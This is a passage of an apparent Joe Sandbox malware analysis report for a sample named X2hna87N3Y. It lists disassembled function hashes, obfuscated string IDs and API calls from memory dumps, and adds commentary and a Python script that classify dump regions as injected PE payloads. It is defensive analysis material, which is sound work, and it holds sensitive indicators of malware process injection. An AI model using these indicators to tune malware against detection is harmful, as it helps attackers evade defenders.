                                                                                                                  • Opcode Fuzzy Hash: b5cf74329583fb6dc28f109f741bad194bfc5361b5aff80978676ceb2c5dc174
                                                                                                                  • Instruction Fuzzy Hash: D9823A756093409BD715CF24C89076FBBD3AFD9704F28892DE4868B391E638EC85CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "A;C$4E{G$A)O+$HI$K%M'$K=a?$W5P7$g9W;$o1m3
                                                                                                                  • API String ID: 0-409907040
                                                                                                                  • Opcode ID: dfbe12f6cf855b52727505a631966c4896db4082a266d60f67f7d3a36d6e034e
                                                                                                                  • Instruction ID: f3beb451a55df6ef81444f5226d72f162fa03879b0bef2b86c1921b2ec460b48
                                                                                                                  • Opcode Fuzzy Hash: dfbe12f6cf855b52727505a631966c4896db4082a266d60f67f7d3a36d6e034e
                                                                                                                  • Instruction Fuzzy Hash: 4A3137769183508BD708DF24CC9122BB7B1EFD5350F0A893CE4C29B755E3388A05C78A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "A;C$4E{G$A)O+$HI$K%M'$K=a?$W5P7$g9W;$o1m3
                                                                                                                  • API String ID: 0-409907040
                                                                                                                  • Opcode ID: 8dc344fedd4e0d0243a31ff6f350895c444f5dee2a627dccb60d8db24d9f15fc
                                                                                                                  • Instruction ID: 008ca852c5b5364f71a5bf04fffa82340e674bf844c2cc4081172530cf1ddf43
                                                                                                                  • Opcode Fuzzy Hash: 8dc344fedd4e0d0243a31ff6f350895c444f5dee2a627dccb60d8db24d9f15fc
                                                                                                                  • Instruction Fuzzy Hash: 7731357691C3948BD3148F14CC9022BBBA1EFD5710F0A8A2CE8C16B755E3788A01CB8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: |G$"qA$+x$A>Z0$D&Z8$F"Q$$Y67H$_.P
                                                                                                                  • API String ID: 0-3507257672
                                                                                                                  • Opcode ID: a78423b1aa92a00a60e32b35e2b103679efca1386eb9b84e49937ba7d09d80ba
                                                                                                                  • Instruction ID: e780818630244df4e0738c155b7ce0f43d14575b734267895fe9f7447747bd08
                                                                                                                  • Opcode Fuzzy Hash: a78423b1aa92a00a60e32b35e2b103679efca1386eb9b84e49937ba7d09d80ba
                                                                                                                  • Instruction Fuzzy Hash: 4C3239716083118BC324CF24C8D06ABB7F2EFC9354F198A2DE9C59B361E7789985C756
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: GAv~$GAv~$mpuv$mpuv$vuGO$vuGO$~r$~r
                                                                                                                  • API String ID: 0-3198300620
                                                                                                                  • Opcode ID: de6b9d48cb82764d41e673354b8639769d3e33e2457edd340b8ca72ce5df5bca
                                                                                                                  • Instruction ID: 498bc63cd0788a0fa09f7b11f375181eb978baea08b83ba7137193302551c8b2
                                                                                                                  • Opcode Fuzzy Hash: de6b9d48cb82764d41e673354b8639769d3e33e2457edd340b8ca72ce5df5bca
                                                                                                                  • Instruction Fuzzy Hash: C5315A3592C3A08BD3408F25D84015BBBD1ABC5344F69862DFCD4AB3A4D9748940879F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &$6|tx$A\$C]$EE}H$flfc$ndnk
                                                                                                                  • API String ID: 0-2838787765
                                                                                                                  • Opcode ID: 22cce4e556a79413b527edd0d19770c08411aa6b193af229ae3e0d5c5912b391
                                                                                                                  • Instruction ID: 96fe208ec5adad25163823696c2573b3fe5d12c39b3c9f596b6d3037b357e5e3
                                                                                                                  • Opcode Fuzzy Hash: 22cce4e556a79413b527edd0d19770c08411aa6b193af229ae3e0d5c5912b391
                                                                                                                  • Instruction Fuzzy Hash: 5602EDB060C3409FD3109F28D89176BBBE2EFC2314F54482DE5C68B3A2E7399945CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: =$I4$ZaX3$[abZ$^a[R$cAYo$fa
                                                                                                                  • API String ID: 0-4131729241
                                                                                                                  • Opcode ID: 405195fbabe1a99b8fe7ce7e2eb3e03672651c921e0400c673a09164baca598c
                                                                                                                  • Instruction ID: 9fb4c51dd36001abaa1e44a4867fa139af67d486df07941b5c6fb338e4f53a06
                                                                                                                  • Opcode Fuzzy Hash: 405195fbabe1a99b8fe7ce7e2eb3e03672651c921e0400c673a09164baca598c
                                                                                                                  • Instruction Fuzzy Hash: 3DB1E57160C3914BC3168F7984A076BFFE19FD7204F48897DE4D56B382D639890ACB9A
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE0F
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00D9C747,?,00000000), ref: 00D9CE38
                                                                                                                  • GetACP.KERNEL32(?,?,00D9C747,?,00000000), ref: 00D9CE4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                  • Opcode ID: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction ID: 0fc6945f2c79d253734742c2b525c288fcfdee3babc7e08326dc03ef9e894f08
                                                                                                                  • Opcode Fuzzy Hash: 6f3e65b028d901b59b2e695b4eab03c167944b628aae05a44ee3feefb8fdaaaf
                                                                                                                  • Instruction Fuzzy Hash: 3221A122A60201EAEF359F64C900B9777A6EB54B64B5AA574F90BD7204F732DE41C3B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(00000000,?,00D999B2), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000,?,?,00000028,00D9412A), ref: 00D97679
                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00D9C719
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D9C757
                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D9C76A
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D9C7B2
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D9C7CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 415426439-0
                                                                                                                  • Opcode ID: 665bc5eaed21e9a4ca380d816de1657ad444bbad024384dabe4783436501a8b2
                                                                                                                  • Instruction ID: e0c77f3c6ba1d87a115fe11664db45f6c3fad82092b2eec64910ad2103614469
                                                                                                                  • Opcode Fuzzy Hash: 665bc5eaed21e9a4ca380d816de1657ad444bbad024384dabe4783436501a8b2
                                                                                                                  • Instruction Fuzzy Hash: AA516D71A20205AFEF10EFA5CC81ABB77B8FF49700F485569E911E7291EB70D9048BB1

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: =$CE;F$I@I9$Y-AE$a
• API String ID: 0-3389986099
• Opcode ID: b5f0f7cb0e6ae96fff35c19959799b81b4123266052ccca757f0ce7cb59562df
• Instruction ID: 7d8f140b44a49b6e2ef46ae00a622f98273c80f69ba2163a61e2a2a483065708
• Opcode Fuzzy Hash: b5f0f7cb0e6ae96fff35c19959799b81b4123266052ccca757f0ce7cb59562df
• Instruction Fuzzy Hash: 535258B490C3508FC725DF24C8407AFBBE1AF96314F08866EE8D55B392D7398946CB96

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: "2$3-$>+$?+$=?
• API String ID: 0-2299533537
• Opcode ID: 547dcb5cf7652dbbacdc4cb9f5e37e6dce14e9fb5fdc8f1e64ffa4f6896b99bb
• Instruction ID: 1a799a2e98b600fa1da2e76793366819dd7b177f36baef7441702b602b875c71
• Opcode Fuzzy Hash: 547dcb5cf7652dbbacdc4cb9f5e37e6dce14e9fb5fdc8f1e64ffa4f6896b99bb
• Instruction Fuzzy Hash: 1EE112B4208340EFE724DF24E88176FB7A1FB86709F90582DE58597361EB38D945CB4A

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: 88FE57294B3FC45EE430B6CE554835A9$<208$<208$N$e32t
• API String ID: 0-1182029055
• Opcode ID: 367741fb7b931ac47e500ccf61d2cd1ddbe63bd8d08a3116b8b6d2552f41cbba
• Instruction ID: 20a34227f67ee4d44eeee74c06e5bcbd5afa54145c4ff8f541f3cb8b1a67e39a
• Opcode Fuzzy Hash: 367741fb7b931ac47e500ccf61d2cd1ddbe63bd8d08a3116b8b6d2552f41cbba
• Instruction Fuzzy Hash: A8B1E2B150C3808BD718DF65D85166FBBE6EBD2314F14892DF4D19B382DA38C90ACB56

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: C+dY$C+dY$G+dY$G+dY$[<
• API String ID: 0-2974196941
• Opcode ID: ddbf06d5e3c392c75608772084daf204ca4e51145b9c43d9e0e44902391ade6f
• Instruction ID: c09d43f335869f7b8f9f12aca26faa345d536313cf1147758d8abc3c2bc18c8b
• Opcode Fuzzy Hash: ddbf06d5e3c392c75608772084daf204ca4e51145b9c43d9e0e44902391ade6f
• Instruction Fuzzy Hash: CF5168746082918FD719CF3594E0773BBA29F97310B2C849DC8D69F716CA39A806CB69

Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
• Instruction ID: 37a066dc76fa12c51f4ac807f9bda618589c05416ca614a213ac30e317d27d68
• Opcode Fuzzy Hash: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
• Instruction Fuzzy Hash: 7B023C71E016199FDF15CFA8D8806AEFBF1FF48324F288269D519A7344D731AA41CBA4

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: '^$5_lh$aQba$xSnU$%x|
• API String ID: 0-882101050
• Opcode ID: 9ec8c59b63fa95e16ec6860a31bbfe7fb180b078cc479365ec457ae7cba96df4
• Instruction ID: e51e21ca4a307056c8b4c0eb2cc43503f709736d3fb72366ef66dfb884cae854
• Opcode Fuzzy Hash: 9ec8c59b63fa95e16ec6860a31bbfe7fb180b078cc479365ec457ae7cba96df4
• Instruction Fuzzy Hash: 6E21043411A3818BD358CF1881A06ABBBE2AFC2344F9C5A1DE4C18B255D734C952CB47

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D8B658
• IsDebuggerPresent.KERNEL32 ref: 00D8B724
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D8B73D
• UnhandledExceptionFilter.KERNEL32(?), ref: 00D8B747
Argument 00000017 is PF_FASTFAIL_AVAILABLE (23). IsProcessorFeaturePresent(PF_FASTFAIL_AVAILABLE) followed by IsDebuggerPresent, SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter is the fail-fast path of the MSVC C runtime (__scrt_fastfail, reached from __report_gsfailure and the other security-check failure handlers), so this function in the loader image at 00D80000 is compiler runtime code: the IsDebuggerPresent call here is CRT boilerplate and is not on its own evidence of a payload-authored anti-debugging check.
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: d318e8fffb9ec372393fd68b63d7949c9c464b080420d8ee76903cb14cdc01b4
• Instruction ID: cef39a7529c0de3d492e38f6b796ca9cae303d47f5585dbe69553e711835a545
• Opcode Fuzzy Hash: d318e8fffb9ec372393fd68b63d7949c9c464b080420d8ee76903cb14cdc01b4
• Instruction Fuzzy Hash: 4731F875D01318DBEF20EF65D98A7CDBBB8EF08310F1041AAE40CAB250EB719A858F55
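
The "Source File" names above encode where each memory dump came from, and that is what decides which dump to reverse first. The following is an added example, not Joe Sandbox code: it decodes the names and classifies each region. The field layout it assumes is inferred from the names on this page and is not documented here; the fifth and seventh fields are read as the Windows PAGE_* protection and MEM_IMAGE/MEM_MAPPED/MEM_PRIVATE type values of MEMORY_BASIC_INFORMATION, and the sixth and eighth fields are left undecoded. The two sample lines are copied from this report.

```python
"""Triage helper for Joe Sandbox memory-dump (.sdmp) names as printed in
"Source File" lines of the report. Added example, not Joe Sandbox code.

Assumed name layout (inferred from the names on this page, not documented):

    <proc>.<dump>.<id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp

<protect> and <type> are read as MEMORY_BASIC_INFORMATION values; <f6> and
<f8> are not decoded.  The security-relevant check: an executable MEM_PRIVATE
region that the sandbox rebuilt "based on PE" is an unpacked or injected
payload, while MEM_IMAGE regions are sections of a legitimately mapped module.
"""
import re
from dataclasses import dataclass

PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80   # any PAGE_EXECUTE* flavour
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80  # RW, WC, RWX, EWC

SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# Shape of the report's "Source File: <name>.sdmp, Offset: <hex>, based on PE: <bool>" lines
SOURCE_LINE_RE = re.compile(
    r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)


@dataclass
class Dump:
    process: int       # process index within the analysis
    index: int         # dump index
    base: int          # region base address
    protect: int       # PAGE_* protection of the region
    mem_type: int      # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE
    based_on_pe: bool  # the sandbox rebuilt a PE from this region

    @property
    def protect_name(self) -> str:
        # low byte only: PAGE_GUARD (0x100) / PAGE_NOCACHE (0x200) are modifiers
        return PAGE_NAMES.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, hex(self.mem_type))

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_sdmp(name: str, based_on_pe: bool = False) -> Dump:
    """Decode one .sdmp file name; raises ValueError on anything else."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised sdmp name: {name}")
    return Dump(process=int(m[1]), index=int(m[2]), base=int(m[4], 16),
                protect=int(m[5], 16), mem_type=int(m[7], 16), based_on_pe=based_on_pe)


def classify(d: Dump) -> str:
    """Verdict a reverser wants before opening the dump."""
    if d.type_name == "MEM_IMAGE":
        return "mapped image section (loader/module code)"
    if d.type_name == "MEM_PRIVATE" and d.based_on_pe and d.executable:
        return "PE in private executable memory: unpacked/injected payload"
    if d.executable and d.writable:
        return "private RWX memory without a PE: shellcode candidate"
    return "data region"


def triage(report_lines):
    """Map each 'Source File' line to (base, protection, type, verdict)."""
    out = []
    for line in report_lines:
        m = SOURCE_LINE_RE.search(line)
        if not m:
            continue
        d = parse_sdmp(m[1], based_on_pe=(m[3] == "true"))
        out.append((f"{d.base:08X}", d.protect_name, d.type_name, classify(d)))
    return out


# Two "Source File" lines copied from this report (the 0x400000 and 0xD80000 regions).
SAMPLE_LINES = [
    "• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true",
    "• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_LINES):
        print(*row, sep=" | ")
```

Run stand-alone it prints one row per dump: the 0x400000 region decodes as PAGE_EXECUTE_READWRITE, MEM_PRIVATE and rebuilt as a PE, which is what the "Injects a PE file into a foreign processes" signature describes and is the dump to load first, while the 0xD81000 region and its Associated D80000/DA8000/DB2000/DB5000/DB7000/DBA000 dumps decode as MEM_IMAGE with read-only, execute-read and write-copy protections, i.e. the legitimately mapped loader module dumped per region.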

Memory Dump Source
• Source File: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ContextCryptErrorLast
• String ID: [+]
• API String ID: 3905322190-4228040803
• Opcode ID: e63e81e63c9a5b55fe565538083e8ededd424f616d3ee076845fea44b8024647
• Instruction ID: bebea69b8ce9923d095444d6482f92dc2abf4670e02574bd3305f18181162d5c
• Opcode Fuzzy Hash: e63e81e63c9a5b55fe565538083e8ededd424f616d3ee076845fea44b8024647
• Instruction Fuzzy Hash: E87138B494522DCBCB64EF68D8987E9BBF0AF28304F1044E9E88D97351D6749AC4CF61

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: @KLM$LO$lZPh$8O
• API String ID: 0-3822996971
• Opcode ID: 18458ae4d7026277bbd0485411983029d0bbd548028fd866e28c3a016821418c
• Instruction ID: e5e404e926c62b15b78a954f1dce4a60e5ad98ee9bd4274b2ff5830d2d540624
• Opcode Fuzzy Hash: 18458ae4d7026277bbd0485411983029d0bbd548028fd866e28c3a016821418c
• Instruction Fuzzy Hash: C9C1227220C3504BD324DF2484512ABFBE3DBC2304F19897EE5D56B382D6799916CB8B

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: GAv~$mpuv$vuGO$~r
• API String ID: 0-696450734
• Opcode ID: 616145d62a7cfb120fd2df19f99f1477c9b0ca032d4529c76d90e9ae1cb433b7
• Instruction ID: ee29cbe9198d147da5b90c3c138bece6e98356071045d62278849ff2cb6e26dc
• Opcode Fuzzy Hash: 616145d62a7cfb120fd2df19f99f1477c9b0ca032d4529c76d90e9ae1cb433b7
• Instruction Fuzzy Hash: 4EF04E35D1C3904AD3408B25DD4401BBFD1A7C6204F79962DFCA4AB3A8D9748940479F

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: >$>'/3$Y012
• API String ID: 0-1372800107
• Opcode ID: d5a35714fc12c8785b29ff3887e88db1e1017f82384d504a27dc8b3e7df6a03c
• Instruction ID: bb97612691e093f91a50172e7c50a6cc0f989e04871ef8642d39ab6c82e7fb39
• Opcode Fuzzy Hash: d5a35714fc12c8785b29ff3887e88db1e1017f82384d504a27dc8b3e7df6a03c
• Instruction Fuzzy Hash: D74136B015C3819BD718DF24C890BABBBE1EF92304F48282DF1D29B391DBB98505CB56

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: YimW$mUhS
• API String ID: 0-3297437401
• Opcode ID: 831d80f5d87b41180382a6403f3d3c9f2583e381982a5f2391941bcea5092d0e
• Instruction ID: 696645c39de08c033dd8a65a8fab49616a9d1a26a8561702ab8e03b9e18acff4
• Opcode Fuzzy Hash: 831d80f5d87b41180382a6403f3d3c9f2583e381982a5f2391941bcea5092d0e
• Instruction Fuzzy Hash: 16E1577560C390CFD3049F28A85162FB7E2AFC6314F988A6DE49587392DB39D905CB4A

Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID:
• String ID: &vq!$lm
• API String ID: 0-4115262290
• Opcode ID: a29d09bfd9b556b20272458391478b0918de14fd7378d9b7865d0f6455a7a235
• Instruction ID: c75819e4c118cd4e29fbf24b4af755497520f5b85f5e7725b6b32e709a625a34
• Opcode Fuzzy Hash: a29d09bfd9b556b20272458391478b0918de14fd7378d9b7865d0f6455a7a235
• Instruction Fuzzy Hash: 8A9154769483108BD314DF64C8923ABB7F1EFD5314F19891EE8C59B380E7788945CB8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #[KO$Y
                                                                                                                  • API String ID: 0-2880779734
                                                                                                                  • Opcode ID: e59fea5aa8018e7e1488389464f67d1e584b2eccc24d91125a8e9bbacc8f1c17
                                                                                                                  • Instruction ID: d1db14263c154f9a5b00c1e4a9ff765da1a6854e091ee8fc4871a768147742b9
                                                                                                                  • Opcode Fuzzy Hash: e59fea5aa8018e7e1488389464f67d1e584b2eccc24d91125a8e9bbacc8f1c17
                                                                                                                  • Instruction Fuzzy Hash: 95919731508390CFD7148F24D85076FB7E2AFDA308F1A882EE4DA97252DB78D845CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: f$q
